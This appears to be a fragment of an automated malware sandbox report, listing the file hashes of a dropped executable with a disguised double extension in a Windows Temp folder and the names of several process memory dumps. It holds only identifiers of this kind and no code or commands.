SHA512 f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

MD5 92f44e405db16ac55d97e3bfe3b132fa
SHA1 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA256 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512 f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

memory/888-96-0x0000000002610000-0x0000000002650000-memory.dmp

memory/888-97-0x0000000002610000-0x0000000002650000-memory.dmp

memory/888-98-0x0000000002610000-0x0000000002650000-memory.dmp